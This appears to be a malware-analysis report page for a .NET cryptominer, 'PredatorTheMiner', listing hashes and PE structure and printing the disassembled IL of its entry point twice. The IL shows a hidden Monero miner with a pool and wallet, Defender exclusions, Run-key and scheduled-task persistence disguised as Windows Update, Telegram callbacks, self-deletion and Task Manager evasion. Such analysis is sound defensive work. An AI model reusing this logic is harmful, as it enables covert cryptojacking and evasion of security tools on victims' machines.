Suspicious
Suspect

dcf7e0f0d4e16559138bc93bb3239c8c

PE Executable
|
MD5: dcf7e0f0d4e16559138bc93bb3239c8c
|
Size: 1.96 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very low

Hash
 Hash Value
MD5
dcf7e0f0d4e16559138bc93bb3239c8c
Sha1
7186be3136533988a882bd1429d81530b3af762f
Sha256
71cb35a5b6c82b57ff2586d698a257a64606207ee884d8c86cc711a3c5f5ffee
Sha384
fedc79079b4c5ec54dcc229b9cd71784b75a431d72e4a90aa9f15ba5f144728e266e5bda864e2f6b1f23ea7f71267c80
Sha512
36128d15f0b44071b7405f3c3b3730d57dafef26e6d330e42aa6e7ef668835831f577d43d8d06b9f5ccb45679304faa81daa00ff15b5851f85e28bf1fbd66676
SSDeep
49152:p8zt1S0tH8/SXCsHhJbv/vnvyYN1HFEHJ:+zfp8qX/TnXHvlEp
TLSH
CB95237B3695C969C733A2B0A8A3E58CFEA33F1729B683171724738D55BB600C679143

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
dcf7e0f0d4e16559138bc93bb3239c8c
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
PredatorTheMiner.Properties.Resources.resources
shost
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
UPX0
UPX1
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
ID:1033-preview.png
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
RT_GROUP_CURSOR4
ID:0065
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\vboxuser\Desktop\Silent-Miner-XMR-Monero-master\obj\Release\PredatorTheMiner.pdb
Module Name

PredatorTheMiner.exe
Full Name

PredatorTheMiner.exe
EntryPoint

System.Void PredatorTheMiner.Program::Main()
Scope Name

PredatorTheMiner.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

PredatorTheMiner
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

76
Main Method

System.Void PredatorTheMiner.Program::Main()
Main IL Instruction Count

222
Main IL

ldstr https://iplogger.com/2j5MD5 call System.Boolean PredatorTheMiner.Helper::SiteConnection(System.String) pop <null> newobj System.Void System.Random::.ctor() ldc.i4.1 <null> ldc.i4 100001 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> ldstr worker_{0}_{1} ldloc.0 <null> box System.Int32 ldloc.1 <null> call System.String System.String::Format(System.String,System.Object,System.Object) stloc.2 <null> newobj System.Void System.Diagnostics.Process::.ctor() stloc.3 <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr --url={0} --user={1} --pass={4} --donate-level=1 --keepalive --retries=5 --max-cpu-usage={3} --cpu-priority=2 ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr xmr.kryptex.network:7029 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr 48sJ3RQVWcR4tHeemmq4cTAwYgTzGeiFWjhSfpphAtmdgDUUX7VMjLUKoWer3FjB8MXLvhocXwcbZUbrQF39gFUAHibpxEM stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr 0x3 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr 75 stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.2 <null> stelem.ref <null> call System.String System.String::Format(System.String,System.Object[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldstr LocalAppData call System.String System.Environment::GetEnvironmentVariable(System.String) dup <null> ldstr \Streamm.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 dup <null> ldstr \runtime-servece.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_5 ldstr \start_miner.vbs call System.String System.String::Concat(System.String,System.String) stloc.s V_6 ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 call System.Void PredatorTheMiner.RunTime/DefenderExclusion::SetupAllExclusions(System.String,System.String,System.String) leave.s IL_00D1: ldloc.s V_4 pop <null> leave.s IL_00D1: ldloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00E8: nop call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0112: nop nop <null> ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00F9: call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Void System.IO.File::Delete(System.String) call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_4 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0112: nop pop <null> leave.s IL_0112: nop nop <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() callvirt System.String System.Diagnostics.ProcessStartInfo::get_Arguments() stloc.s V_7 ldstr Set WshShell = CreateObject("WScript.Shell") stloc.s V_8 ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr WshShell.Run """ stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.s V_5 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr "" stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_7 stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr ", 0, False stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldloc.s V_6 ldloc.s V_8 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldloc.s V_6 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0171: ldc.i4.0 pop <null> leave.s IL_0171: ldc.i4.0 ldc.i4.0 <null> call System.Void PredatorTheMiner.RunTime/Defend::SetupDefend(PredatorTheMiner.RunTime/Defend/DefendOptions) ldstr Windows_launcher newobj System.Void PredatorTheMiner.Implant/ScheduleTask::.ctor(System.String) ldstr wscript.exe " ldloc.s V_6 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void PredatorTheMiner.Implant/ScheduleTask::AddTask(System.String) ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) dup <null> ldstr Windows Update Service ldstr wscript.exe " ldloc.s V_6 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) callvirt System.Void Microsoft.Win32.RegistryKey::Close() leave.s IL_01CD: ldloc.s V_5 pop <null> leave.s IL_01CD: ldloc.s V_5 ldloc.s V_5 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_01E2: ldloc.3 ldloc.s V_5 call System.Byte[] PredatorTheMiner.Properties.Resources::get_shost() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> call System.Void PredatorTheMiner.Program::SendTelegramNotification() call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::DeleteMe() leave.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() pop <null> leave.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::AuthorFee() ldstr taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 ldstr Taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 ldstr ProcessHacker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 call System.Boolean System.Environment::get_HasShutdownStarted() brtrue.s IL_027C: ldloc.3 ldstr ldstr Task Manager call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brtrue.s IL_027C: ldloc.3 ldstr ldstr Диспетчер задач call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0288: ldc.i4.s 10 ldloc.3 <null> callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 10 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_0218: ldstr "taskmgr" pop <null> leave.s IL_0294: ret ret <null>
Module Name

PredatorTheMiner.exe
Full Name

PredatorTheMiner.exe
EntryPoint

System.Void PredatorTheMiner.Program::Main()
Scope Name

PredatorTheMiner.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

PredatorTheMiner
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

76
Main Method

System.Void PredatorTheMiner.Program::Main()
Main IL Instruction Count

222
Main IL

ldstr https://iplogger.com/2j5MD5 call System.Boolean PredatorTheMiner.Helper::SiteConnection(System.String) pop <null> newobj System.Void System.Random::.ctor() ldc.i4.1 <null> ldc.i4 100001 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> ldstr worker_{0}_{1} ldloc.0 <null> box System.Int32 ldloc.1 <null> call System.String System.String::Format(System.String,System.Object,System.Object) stloc.2 <null> newobj System.Void System.Diagnostics.Process::.ctor() stloc.3 <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr --url={0} --user={1} --pass={4} --donate-level=1 --keepalive --retries=5 --max-cpu-usage={3} --cpu-priority=2 ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr xmr.kryptex.network:7029 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr 48sJ3RQVWcR4tHeemmq4cTAwYgTzGeiFWjhSfpphAtmdgDUUX7VMjLUKoWer3FjB8MXLvhocXwcbZUbrQF39gFUAHibpxEM stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr 0x3 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr 75 stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.2 <null> stelem.ref <null> call System.String System.String::Format(System.String,System.Object[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldstr LocalAppData call System.String System.Environment::GetEnvironmentVariable(System.String) dup <null> ldstr \Streamm.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 dup <null> ldstr \runtime-servece.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_5 ldstr \start_miner.vbs call System.String System.String::Concat(System.String,System.String) stloc.s V_6 ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 call System.Void PredatorTheMiner.RunTime/DefenderExclusion::SetupAllExclusions(System.String,System.String,System.String) leave.s IL_00D1: ldloc.s V_4 pop <null> leave.s IL_00D1: ldloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00E8: nop call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0112: nop nop <null> ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00F9: call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Void System.IO.File::Delete(System.String) call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_4 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0112: nop pop <null> leave.s IL_0112: nop nop <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() callvirt System.String System.Diagnostics.ProcessStartInfo::get_Arguments() stloc.s V_7 ldstr Set WshShell = CreateObject("WScript.Shell") stloc.s V_8 ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr WshShell.Run """ stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.s V_5 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr "" stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_7 stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr ", 0, False stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldloc.s V_6 ldloc.s V_8 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldloc.s V_6 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0171: ldc.i4.0 pop <null> leave.s IL_0171: ldc.i4.0 ldc.i4.0 <null> call System.Void PredatorTheMiner.RunTime/Defend::SetupDefend(PredatorTheMiner.RunTime/Defend/DefendOptions) ldstr Windows_launcher newobj System.Void PredatorTheMiner.Implant/ScheduleTask::.ctor(System.String) ldstr wscript.exe " ldloc.s V_6 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void PredatorTheMiner.Implant/ScheduleTask::AddTask(System.String) ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) dup <null> ldstr Windows Update Service ldstr wscript.exe " ldloc.s V_6 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) callvirt System.Void Microsoft.Win32.RegistryKey::Close() leave.s IL_01CD: ldloc.s V_5 pop <null> leave.s IL_01CD: ldloc.s V_5 ldloc.s V_5 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_01E2: ldloc.3 ldloc.s V_5 call System.Byte[] PredatorTheMiner.Properties.Resources::get_shost() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> call System.Void PredatorTheMiner.Program::SendTelegramNotification() call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::DeleteMe() leave.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() pop <null> leave.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::AuthorFee() ldstr taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 ldstr Taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 ldstr ProcessHacker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 call System.Boolean System.Environment::get_HasShutdownStarted() brtrue.s IL_027C: ldloc.3 ldstr ldstr Task Manager call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brtrue.s IL_027C: ldloc.3 ldstr ldstr Диспетчер задач call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0288: ldc.i4.s 10 ldloc.3 <null> callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 10 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_0218: ldstr "taskmgr" pop <null> leave.s IL_0294: ret ret <null>
dcf7e0f0d4e16559138bc93bb3239c8c (1.96 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙